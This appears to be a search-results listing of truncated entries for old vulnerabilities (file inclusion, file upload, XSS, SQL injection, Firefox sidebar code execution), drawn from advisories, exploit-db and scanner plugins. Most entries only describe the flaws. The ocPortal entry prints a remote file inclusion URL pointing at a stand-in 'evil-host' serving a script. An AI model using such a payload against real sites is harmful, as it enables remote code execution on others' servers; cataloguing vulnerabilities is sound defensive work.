PHP iCalendar Local File Inclusion

Binary data 3479.prm...

CVE-2006-0803

The signature verification functionality in the YaST Online Update YOU script handling relies on a gpg feature that is not intended for signature verification, which prevents YOU from detecting malicious scripts or code that do not pass the signature check when gpg 1.4.x is being used...

PhpGroupWare Calendar Server Side Script Execution Vulnerability

PhpGroupWare is prone to a remote attack. SPDX-FileCopyrightText: 2005 David Maciejak Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:phpgroupware:phpgroupware";...

phpCMS XSS

The remote host runs phpCMS, a content management system written in PHP. This version is vulnerable to cross-site scripting due to a lack of sanitization of user-supplied data in parser.php script. SPDX-FileCopyrightText: 2004 David Maciejak Some text descriptions might be excerpted from a...

MAXdev MD-Pro 1.0.73 - Arbitrary File Upload

source: https://www.securityfocus.com/bid/14750/info MAXdev MD-Pro is prone to an arbitrary remote file upload vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. This issue is due to a design error in the application that uses a blacklist...

CPaint 1.3 - xmlhttp Request Input Validation

CPaint 1.3 - xmlhttp Request Input Validation source: https://www.securityfocus.com/bid/14577/info CPAINT is prone to an input validation vulnerability. This issue occurs because the application fails to properly sanitize malicious scripts and requests from user-supplied input. Successful...

ASPPlayGround.NET 3.2 SR1 - Arbitrary File Upload

ASPPlayGround.NET 3.2 SR1 - Arbitrary File Upload source: https://www.securityfocus.com/bid/14070/info ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability. Exploiting this issue may allow remote attackers to upload arbitrary files including malicious scripts and possibly...

Sambar Server 5.x6.06.1 - Server Referer Cross-Site Scripting

Sambar Server 5.x6.06.1 - Server Referer Cross-Site Scripting source: https://www.securityfocus.com/bid/13722/info Sambar Server administrative interface does not adequately filter some HTML code thus making it prone to cross-site scripting attacks. It is possible for a remote attacker to create ...

GLSA-200504-24 : eGroupWare: XSS and SQL injection vulnerabilities

The remote host is affected by the vulnerability described in GLSA-200504-24 eGroupWare: XSS and SQL injection vulnerabilities Multiple SQL injection and cross-site scripting vulnerabilities have been found in several eGroupWare modules. Impact : An attacker could possibly use the SQL injection...

security flaw

Firefox before 1.0.3, Mozilla Suite before 1.7.7, and Netscape 7.2 allows remote attackers to replace existing search plugins with malicious ones using sidebar.addSearchEngine and the same filename as the target engine, which may not be displayed in the GUI, which could then be used to execute...

Arbitrary code execution from Firefox sidebar panel II — Mozilla

Sites can use the search target to open links in the Firefox sidebar. Two missing security checks allow malicious scripts to first open a privileged page such as about:config and then inject script using a javascript: url. This could be used to install malicious code or steal data without user...

firefox -- arbitrary code execution in sidebar panel

A Mozilla Foundation Security Advisory reports: Sites can use the search target to open links in the Firefox sidebar. Two missing security checks allow malicious scripts to first open a privileged page such as about:config and then inject script using a javascript: url. This could be used to...

ocPortal 1.0.3 Remote File Inclusion

Exploit for unknown platform in category web applications ==================================== ocPortal 1.0.3 Remote File Inclusion ==================================== http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.p...

GNU Info 4.7 - Follow XRef Buffer Overrun

source: https://www.securityfocus.com/bid/10882/info GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the f follow xref Info command. An attacker may exploit this...

Gallery 1.4.4 - Remote Server-Side Script Execution

source: https://www.securityfocus.com/bid/10968/info A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'settimelimit' function. The issue presents itself becuase...

JBrowser 1.02.x - Unauthorized Admin Access

JBrowser 1.02.x - Unauthorized Admin Access source: https://www.securityfocus.com/bid/9537/info Due to a lack of access validation to the 'admin' directory, malevolent users may be able to execute arbitrary admin scripts. This may allow a malicious user to upload arbitrary files to the affected...

PHPGedView 2.61 - Multiple Remote File Inclusions

source: https://www.securityfocus.com/bid/9368/info PhpGedView is prone to multiple file include vulnerabilities. The source of the issue is that a number of scripts that ship with the software permit remote users to influence require paths for various external files. This will permit remote...

HotNews 0.x - hotnews-engine.inc.php3?config[header] Remote File Inclusion

HotNews 0.x - hotnews-engine.inc.php3?configheader Remote File Inclusion source: https://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included...

EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion

source: https://www.securityfocus.com/bid/9338/info EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerab...

Multiple web-based email services fail to filter malicious characters when the message contains cascading style sheet character escaping

Overview An attacker can send a specially crafted email message to a victim containing malicious scripting JavaScript, VBScript, JScript, etc., active content, or potentially HTML. When a victim views the message with scripting enabled, the victim's browser will then interpret this javascript whi...